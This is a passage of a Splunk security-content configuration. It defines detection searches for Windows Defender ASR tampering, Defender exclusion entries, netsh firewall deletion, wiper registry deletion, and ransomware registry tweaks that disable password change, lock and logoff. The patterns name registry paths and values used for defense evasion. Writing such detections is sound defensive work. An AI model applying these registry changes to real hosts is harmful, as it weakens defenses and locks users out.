Rule] action.escu = 0 action.escu.enabled = 1 description = This detection searches for Windows Defender ASR registry modification events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for ASR registry modification events that are generated when a process or application attempts to modify a registry key that is blocked by an ASR rule. Typically, these will be enabled in block most after auditing and tuning the ASR rules themselves. Set to TTP once tuned. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection searches for Windows Defender ASR registry modification events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for ASR registry modification events that are generated when a process or application attempts to modify a registry key that is blocked by an ASR rule. Typically, these will be enabled in block most after auditing and tuning the ASR rules themselves. Set to TTP once tuned. action.escu.how_to_implement = The following analytic requires collection of Windows Defender Operational logs in either XML or multi-line. To collect, setup a new input for the Windows Defender Operational logs. In addition, it does require a lookup that maps the ID to ASR Rule name. action.escu.known_false_positives = False positives are expected from legitimate applications generating events that are similar to those generated by malicious activity. For example, Event ID 5007 is generated when a process attempts to modify a registry key that is related to ASR rules. This can be triggered by legitimate applications that attempt to modify registry keys that are not blocked by ASR rules. action.escu.creation_date = 2023-11-27 action.escu.modification_date = 2023-11-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Defender ASR Registry Modification - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Defender"] action.escu.analytic_story = ["Windows Attack Surface Reduction"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Defender ASR Registry Modification - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Attack Surface Reduction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `ms_defender` EventCode IN (5007) | rex field=New_Value "0x(?\\d+)$" | rex field=Old_Value "0x(?\\d+)$" | rex field=New_Value "Rules\\\\(?[A-Fa-f0-9\\-]+)\\s*=" | lookup asr_rules ID AS ASR_ID OUTPUT ASR_Rule | eval New_Registry_Value=case(New_Registry_Value=="0", "Disabled", New_Registry_Value=="1", "Block", New_Registry_Value=="2", "Audit", New_Registry_Value=="6", "Warn") | eval Old_Registry_Value=case(Old_Registry_Value=="0", "Disabled", Old_Registry_Value=="1", "Block", Old_Registry_Value=="2", "Audit", Old_Registry_Value=="6", "Warn") | stats count min(_time) as firstTime max(_time) as lastTime by host, New_Value, Old_Value, Old_Registry_Value, New_Registry_Value, ASR_Rule | `security_content_ctime(firstTime)`| rename host as dest | `security_content_ctime(lastTime)` | `windows_defender_asr_registry_modification_filter` [ESCU - Windows Defender ASR Rule Disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies when a Windows Defender ASR rule disabled events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for ASR rule disabled events that are generated when an ASR rule is disabled. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies when a Windows Defender ASR rule disabled events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for ASR rule disabled events that are generated when an ASR rule is disabled. action.escu.how_to_implement = The following analytic requires collection of Windows Defender Operational logs in either XML or multi-line. To collect, setup a new input for the Windows Defender Operational logs. In addition, it does require a lookup that maps the ID to ASR Rule name. action.escu.known_false_positives = False positives may occur if applications are typically disabling ASR rules in the environment. Monitor for changes to ASR rules to determine if this is a false positive. action.escu.creation_date = 2023-11-27 action.escu.modification_date = 2023-11-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Defender ASR Rule Disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Defender"] action.escu.analytic_story = ["Windows Attack Surface Reduction"] action.risk = 1 action.risk.param._risk_message = ASR rule disabled event, $ASR_Rule$, was triggered on $dest$. action.risk.param._risk = [{"risk_object_field": "ASR_Rule", "risk_object_type": "other", "risk_score": 100}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Defender ASR Rule Disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Attack Surface Reduction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies when a Windows Defender ASR rule disabled events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. This detection searches for ASR rule disabled events that are generated when an ASR rule is disabled. action.notable.param.rule_title = Windows Defender ASR Rule Disabled action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `ms_defender` EventCode IN (5007) | rex field=New_Value "0x(?\\d+)$" | rex field=Old_Value "0x(?\\d+)$" | rex field=New_Value "Rules\\\\(?[A-Fa-f0-9\\-]+)\\s*=" | lookup asr_rules ID AS ASR_ID OUTPUT ASR_Rule | eval New_Registry_Value=case(New_Registry_Value=="0", "Disabled", New_Registry_Value=="1", "Block", New_Registry_Value=="2", "Audit", New_Registry_Value=="6", "Warn") | eval Old_Registry_Value=case(Old_Registry_Value=="0", "Disabled", Old_Registry_Value=="1", "Block", Old_Registry_Value=="2", "Audit", Old_Registry_Value=="6", "Warn") | search New_Registry_Value="Disabled" | stats count min(_time) as firstTime max(_time) as lastTime by host, New_Value, Old_Value, Old_Registry_Value, New_Registry_Value, ASR_Rule | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| rename host as dest | `windows_defender_asr_rule_disabled_filter` [ESCU - Windows Defender ASR Rules Stacking - Rule] action.escu = 0 action.escu.enabled = 1 description = This hunting analytic targets a range of security events from Microsoft Defender, focusing on the Exploit Guard and Attack Surface Reduction (ASR) features. It monitors specific Event IDs - Event IDs 1121 and 1126 indicate active blocking of unauthorized operations or dangerous network connections, whereas Event IDs 1122 and 1125 represent audit logs for similar activities. Event ID 1129 shows user overrides on blocked operations. For ASR-related activities, Event IDs 1131 and 1133 signal blocked operations, while 1132 and 1134 are audit logs. Event ID 5007 alerts on configuration changes, possibly indicating security breaches. \ Additionally, the analytic utilizes a lookup to correlate ASR rule GUIDs with their descriptive names, enhancing understanding of the context behind these security alerts. This includes rules for blocking vulnerable drivers, restricting actions of Adobe Reader and Office applications, and protecting against various malware and unauthorized system changes. This comprehensive approach aids in assessing policy enforcement and potential security risks. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1566.001", "T1566.002", "T1059"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This hunting analytic targets a range of security events from Microsoft Defender, focusing on the Exploit Guard and Attack Surface Reduction (ASR) features. It monitors specific Event IDs - Event IDs 1121 and 1126 indicate active blocking of unauthorized operations or dangerous network connections, whereas Event IDs 1122 and 1125 represent audit logs for similar activities. Event ID 1129 shows user overrides on blocked operations. For ASR-related activities, Event IDs 1131 and 1133 signal blocked operations, while 1132 and 1134 are audit logs. Event ID 5007 alerts on configuration changes, possibly indicating security breaches. \ Additionally, the analytic utilizes a lookup to correlate ASR rule GUIDs with their descriptive names, enhancing understanding of the context behind these security alerts. This includes rules for blocking vulnerable drivers, restricting actions of Adobe Reader and Office applications, and protecting against various malware and unauthorized system changes. This comprehensive approach aids in assessing policy enforcement and potential security risks. action.escu.how_to_implement = The following analytic requires collection of Windows Defender Operational logs in either XML or multi-line. To collect, setup a new input for the Windows Defender Operational logs. In addition, it does require a lookup that maps the ID to ASR Rule name. Note that Audit and block Event IDs have different fields, therefore the analytic will need to be modified for each type of event. The analytic can be modified to look for specific ASR rules, or to look for specific Event IDs. EventID 5007 is a change in the registry, and may be a false positive. This can be removed from the search if desired. action.escu.known_false_positives = False positives are not expected with this analytic, since it is a hunting analytic. It is meant to show the use of ASR rules and how they can be used to detect malicious activity. action.escu.creation_date = 2023-11-20 action.escu.modification_date = 2023-11-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Defender ASR Rules Stacking - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Defender"] action.escu.analytic_story = ["Windows Attack Surface Reduction"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Defender ASR Rules Stacking - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Attack Surface Reduction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 50, "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1566.001", "T1566.002", "T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `ms_defender` EventCode IN (1121, 1122, 1125, 1126, 1129, 1131, 1132, 1133, 1134, 5007) | lookup asr_rules ID OUTPUT ASR_Rule | fillnull value=NULL | stats count min(_time) as firstTime max(_time) as lastTime by host Parent_Commandline, Process_Name, Path, ID, EventCode, ASR_Rule | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| rename host as dest | `windows_defender_asr_rules_stacking_filter` [ESCU - Windows Defender Exclusion Registry Entry - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic will detect a suspicious process that modify a registry related to windows defender exclusion feature. This registry is abused by adversaries, malware author and red teams to bypassed Windows Defender Anti-Virus product by excluding folder path, file path, process, extensions and etc. from its real time or schedule scan to execute their malicious code. This is a good indicator for a defense evasion and to look further for events after this behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic will detect a suspicious process that modify a registry related to windows defender exclusion feature. This registry is abused by adversaries, malware author and red teams to bypassed Windows Defender Anti-Virus product by excluding folder path, file path, process, extensions and etc. from its real time or schedule scan to execute their malicious code. This is a good indicator for a defense evasion and to look further for events after this behavior. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = admin or user may choose to use this windows features. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Defender Exclusion Registry Entry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Remcos", "Windows Defense Evasion Tactics", "Azorult", "Qakbot", "Warzone RAT"] action.risk = 1 action.risk.param._risk_message = Exclusion registry $registry_path$ modified or added on $dest$ for Windows Defender action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Defender Exclusion Registry Entry - Rule action.correlationsearch.annotations = {"analytic_story": ["Remcos", "Windows Defense Evasion Tactics", "Azorult", "Qakbot", "Warzone RAT"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic will detect a suspicious process that modify a registry related to windows defender exclusion feature. This registry is abused by adversaries, malware author and red teams to bypassed Windows Defender Anti-Virus product by excluding folder path, file path, process, extensions and etc. from its real time or schedule scan to execute their malicious code. This is a good indicator for a defense evasion and to look further for events after this behavior. action.notable.param.rule_title = Windows Defender Exclusion Registry Entry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = "*\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\*") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_defender_exclusion_registry_entry_filter` [ESCU - Windows Delete or Modify System Firewall - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies potentially malicious 'netsh' processes that manipulate firewall configurations. This behavior has been observed in the NJRAT malware, which deletes its added firewall rules as part of its cleanup process. Leveraging this anomaly detection can be a valuable approach for detecting malware, such as NJRAT, that makes alterations to firewall configurations as a component of its malicious activities. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.004"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies potentially malicious 'netsh' processes that manipulate firewall configurations. This behavior has been observed in the NJRAT malware, which deletes its added firewall rules as part of its cleanup process. Leveraging this anomaly detection can be a valuable approach for detecting malware, such as NJRAT, that makes alterations to firewall configurations as a component of its malicious activities. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator may modify or delete firewall configuration. action.escu.creation_date = 2023-09-08 action.escu.modification_date = 2023-09-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Delete or Modify System Firewall - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["NjRAT"] action.risk = 1 action.risk.param._risk_message = A $process_name$ deleted a firewall configuration on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Delete or Modify System Firewall - Rule action.correlationsearch.annotations = {"analytic_story": ["NjRAT"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_netsh` Processes.process = "* firewall *" Processes.process = "* delete *" by Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process_id Processes.process_guid Processes.process Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_delete_or_modify_system_firewall_filter` [ESCU - Windows Deleted Registry By A Non Critical Process File Path - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect deletion of registry with suspicious process file path. This technique was seen in Double Zero wiper malware where it will delete all the subkey in HKLM, HKCU and HKU registry hive as part of its destructive payload to the targeted hosts. This anomaly detections can catch possible malware or advesaries deleting registry as part of defense evasion or even payload impact but can also catch for third party application updates or installation. In this scenario false positive filter is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect deletion of registry with suspicious process file path. This technique was seen in Double Zero wiper malware where it will delete all the subkey in HKLM, HKCU and HKU registry hive as part of its destructive payload to the targeted hosts. This anomaly detections can catch possible malware or advesaries deleting registry as part of defense evasion or even payload impact but can also catch for third party application updates or installation. In this scenario false positive filter is needed. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = This detection can catch for third party application updates or installation. In this scenario false positive filter is needed. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Deleted Registry By A Non Critical Process File Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "Double Zero Destructor"] action.risk = 1 action.risk.param._risk_message = registry was deleted by a suspicious $process_name$ with proces path $process_path in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Deleted Registry By A Non Critical Process File Path - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Double Zero Destructor"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count from datamodel=Endpoint.Registry WHERE Registry.action=deleted BY _time span=1h Registry.dest Registry.registry_path Registry.registry_value_name Registry.registry_key_name Registry.process_guid Registry.registry_value_data Registry.action | `drop_dm_object_name(Registry)` | join process_guid [| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes WHERE NOT (Processes.process_path IN ("*\\windows\\*", "*\\program files*")) by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.user Processes.parent_process_name Processes.parent_process Processes.process_path Processes.process_guid | `drop_dm_object_name(Processes)`] | fields _time parent_process_name parent_process process_name process_path process process_guid registry_path registry_value_name registry_value_data registry_key_name action dest user | `windows_deleted_registry_by_a_non_critical_process_file_path_filter` [ESCU - Windows Disable Change Password Through Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious registry modification to disable change password feature of the windows host. This registry modification may disables the Change Password button on the Windows Security dialog box (which appears when you press Ctrl+Alt+Del). As a result, users cannot change their Windows password on demand. This technique was seen in some malware family like ransomware to prevent the user to change the password after ownning the network or a system during attack. This windows feature may implemented by administrator to prevent normal user to change the password of a critical host or server, In this type of scenario filter is needed to minimized false positive. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} action.escu.data_models = ["Change", "Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious registry modification to disable change password feature of the windows host. This registry modification may disables the Change Password button on the Windows Security dialog box (which appears when you press Ctrl+Alt+Del). As a result, users cannot change their Windows password on demand. This technique was seen in some malware family like ransomware to prevent the user to change the password after ownning the network or a system during attack. This windows feature may implemented by administrator to prevent normal user to change the password of a critical host or server, In this type of scenario filter is needed to minimized false positive. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = This windows feature may implemented by administrator to prevent normal user to change the password of a critical host or server, In this type of scenario filter is needed to minimized false positive. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Disable Change Password Through Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Windows Defense Evasion Tactics"] action.risk = 1 action.risk.param._risk_message = Registry modification in "DisableChangePassword" on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Disable Change Password Through Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableChangePassword" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_change_password_through_registry_filter` [ESCU - Windows Disable Lock Workstation Feature Through Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious registry modification to disable Lock Computer windows features. This registry modification prevent the user from locking its screen or computer that are being abused by several malware for example ransomware. This technique was used by threat actor to make its payload more impactful to the compromised host. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious registry modification to disable Lock Computer windows features. This registry modification prevent the user from locking its screen or computer that are being abused by several malware for example ransomware. This technique was used by threat actor to make its payload more impactful to the compromised host. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Disable Lock Workstation Feature Through Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Windows Defense Evasion Tactics", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = Registry modification in "DisableLockWorkstation" on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Disable Lock Workstation Feature Through Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Windows Defense Evasion Tactics", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_lock_workstation_feature_through_registry_filter` [ESCU - Windows Disable LogOff Button Through Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious registry modification to disable logoff feature in windows host. This registry when enable will prevent users to log off of the system by using any method, including programs run from the command line, such as scripts. It also disables or removes all menu items and buttons that log the user off of the system. This technique was seen abused by ransomware malware to make the compromised host un-useful and hard to remove other registry modification made on the machine that needs restart to take effect. This windows feature may implement by administrator in some server where shutdown is critical. In that scenario filter of machine and users that can modify this registry is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious registry modification to disable logoff feature in windows host. This registry when enable will prevent users to log off of the system by using any method, including programs run from the command line, such as scripts. It also disables or removes all menu items and buttons that log the user off of the system. This technique was seen abused by ransomware malware to make the compromised host un-useful and hard to remove other registry modification made on the machine that needs restart to take effect. This windows feature may implement by administrator in some server where shutdown is critical. In that scenario filter of machine and users that can modify this registry is needed. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = This windows feature may implement by administrator in some server where shutdown is critical. In that scenario filter of machine and users that can modify this registry is needed. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Disable LogOff Button Through Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = Registry modification in "NoLogOff" on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Disable LogOff Button Through Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\*" Registry.registry_value_name IN ("NoLogOff", 